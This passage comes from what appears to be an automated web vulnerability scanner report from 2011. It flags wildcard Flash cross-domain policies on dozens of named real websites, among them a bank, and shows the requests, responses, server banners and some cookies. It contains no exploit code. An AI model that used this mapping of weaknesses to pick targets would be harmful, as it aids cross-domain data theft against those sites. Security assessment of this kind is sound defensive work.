The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ew.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:12 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.57. http://www.ez-tracks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ez-tracks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ez-tracks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 14:14:23 GMT
Content-Length: 208
Content-Type: text/xml
Content-Location: http://www.ez-tracks.com/crossdomain.xml
Last-Modified: Wed, 01 Dec 2004 14:18:24 GMT
Accept-Ranges: bytes
ETag: "12a73b9eb0d7c41:cb57"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.58. http://www.flixster.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flixster.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:44:51 GMT
ETag: "64"
Accept-Ranges: bytes
Content-Length: 100
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:51:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.59. http://www.freeonlinegames.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freeonlinegames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freeonlinegames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 17:53:10 GMT
ETag: "180823b-a5-dc9e0d80"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

7.60. http://www.g4tv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.g4tv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.g4tv.com

Response

HTTP/1.0 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml
Content-Length: 208
Cache-Control: private, max-age=58266
Date: Sat, 02 Apr 2011 13:40:33 GMT
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.61. http://www.gamerdna.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamerdna.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamerdna.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.5
Last-Modified: Sat, 22 Nov 2008 02:54:30 GMT
ETag: "7bce-a2-45c3e47d96580"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.62. http://www.gamesradar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamesradar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamesradar.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:56 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Last-Modified: Tue, 04 May 2010 19:20:06 GMT
ETag: "2bc0006-1cc-485c998d72580"
Accept-Ranges: bytes
Content-Length: 460
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="gr22static.gamesradar.com" />
   <allow-access-from domain="static22.gamesradar.com" />
...[SNIP]...
<allow-access-from domain="*.serving-sys.com" />
   <allow-access-from domain="*" />
...[SNIP]...

7.63. http://www.gametrailers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gametrailers.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Last-Modified: Wed, 02 Feb 2011 00:17:00 GMT
ETag: "1268c463d-cf-49b4191509700"
Accept-Ranges: bytes
Content-Length: 207
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:37:31 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:37:31 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

7.64. http://www.gourmandia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gourmandia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:42 GMT
Server: Apache
Last-Modified: Thu, 19 Aug 2010 21:34:46 GMT
ETag: "66880b1-ce-f3774980"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.65. http://www.greenwichmeantime.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenwichmeantime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.greenwichmeantime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:32 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Sat, 20 Mar 2010 13:46:58 GMT
ETag: "c8c8aa-100-b408ce80"
Accept-Ranges: bytes
Content-Length: 256
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="*" />
...[SNIP]...

7.66. http://www.groupon.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 164396
Date: Sat, 02 Apr 2011 13:32:32 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

7.67. http://www.health.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.health.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.health.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.68. http://www.hiconversion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hiconversion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hiconversion.com

Response

HTTP/1.1 200 OK
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:58:17 GMT
ETag: W/"104-1301603701000"
Last-Modified: Thu, 31 Mar 2011 20:35:01 GMT
Server: Apache/2.2.9 (Fedora)
Vary: Accept-Encoding
Content-Length: 104
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.69. http://www.hodesiq.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hodesiq.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hodesiq.com

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Mon, 20 Jul 2009 17:51:43 GMT
Accept-Ranges: bytes
ETag: "dbdeeabd629ca1:aea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:13:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.70. http://www.hollywoodreporter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywoodreporter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hollywoodreporter.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/xml
Last-Modified: Sun, 10 Oct 2010 23:05:43 GMT
Content-Length: 193
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:45:55 GMT
Date: Sat, 02 Apr 2011 13:44:55 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.71. http://www.howstuffworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.howstuffworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.howstuffworks.com

Response

HTTP/1.0 200 OK
Server: ATS/2.1.6-unstable
Last-Modified: Sat, 02 Apr 2011 13:00:32 GMT
P3P: CP="ALL DSP COR CUR ADMo DEVo TAIo PSAo PSDo IVAo CONi OTPi OUR NOR UNI"
Content-Length: 200
Content-Type: text/xml; charset=UTF-8
Date: Sat, 02 Apr 2011 13:23:54 GMT
Connection: close
Set-Cookie: target=us; path=/; domain=.howstuffworks.com
Expires: Sat, 02 Apr 2011 14:00:00 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.72. http://www.huffingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 12:37:46 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

7.73. http://www.imagebam.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imagebam.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imagebam.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:30 GMT
Server: Apache
Last-Modified: Sat, 21 Aug 2010 15:06:52 GMT
ETag: "63bda7-cb-48e56c3e8fb00"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.74. http://www.imageshack.us/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:41 GMT
Content-Type: text/xml
Content-Length: 1198
Last-Modified: Thu, 15 Jul 2010 21:31:01 GMT
Connection: close
Set-Cookie: is_uuid=fe9301e8d0274d608c047983f575fec4; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from headers="*" secure="false" domain="*.imageshack.us" />
<allow-http-requ
...[SNIP]...

7.75. http://www.ingdirect.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ingdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ingdirect.com

Response

HTTP/1.1 200 OK
Connection: close
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Last-Modified: Thu, 26 Feb 2009 18:21:42 GMT
Date: Sat, 02 Apr 2011 13:43:45 GMT
Content-Length: 209
ETag: "pv26ac04c4b7dfa765f73411be4237c54b"
X-PvInfo: [S10232.C6966.A37933.RA0.G94E8.U62A8AA9F].[OT/xml.OG/pages]
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.76. http://www.instructables.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instructables.com

Response

HTTP/1.1 200 OK
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
ETag: "DV9F16DWcqJ"
Last-Modified: Sat, 15 Jan 2011 00:26:28 GMT
Content-Type: text/xml
Content-Length: 201
X-Cacheable: YES - 30 minutes
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:36:03 GMT
X-Varnish: 4054888881 4054848118
Age: 408
Via: 1.1 varnish
X-Cache-Svr: squid02.instructables.com
X-Cache: HIT
X-Cache-Hits: 18
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.77. http://www.instyle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instyle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instyle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:57 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.78. http://www.intellicast.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intellicast.com

Response

HTTP/1.1 200 OK
Content-Length: 136
Content-Type: text/xml
Content-Location: http://www.intellicast.com/crossdomain.xml
Last-Modified: Mon, 15 Feb 2010 17:02:22 GMT
Accept-Ranges: bytes
ETag: "e4451aa460aeca1:30d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:22 GMT
Connection: close
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=ffffffff094a140b45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:26:25 GMT;path=/;httponly

...<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure = "true"/>
</cross-domain-policy>

7.79. http://www.kaboodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kaboodle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
ETag: W/"200-1301007108000"
Last-Modified: Thu, 24 Mar 2011 22:51:48 GMT
Content-Type: application/xml
Content-Length: 200
Date: Sat, 02 Apr 2011 13:30:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.80. http://www.like.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.like.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.like.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Jan 2010 18:02:03 GMT
X-Like-Servetime: Servetime: D=603
Content-Type: application/xml
Vary: User-Agent
Date: Sat, 02 Apr 2011 13:55:28 GMT
Content-Length: 360
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.81. http://www.liveleak.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.liveleak.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.liveleak.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:09 GMT
Server: Apache
Last-Modified: Wed, 20 Aug 2008 11:50:42 GMT
ETag: "50284d-cd-48ac0512"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.82. http://www.manualsonline.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manualsonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

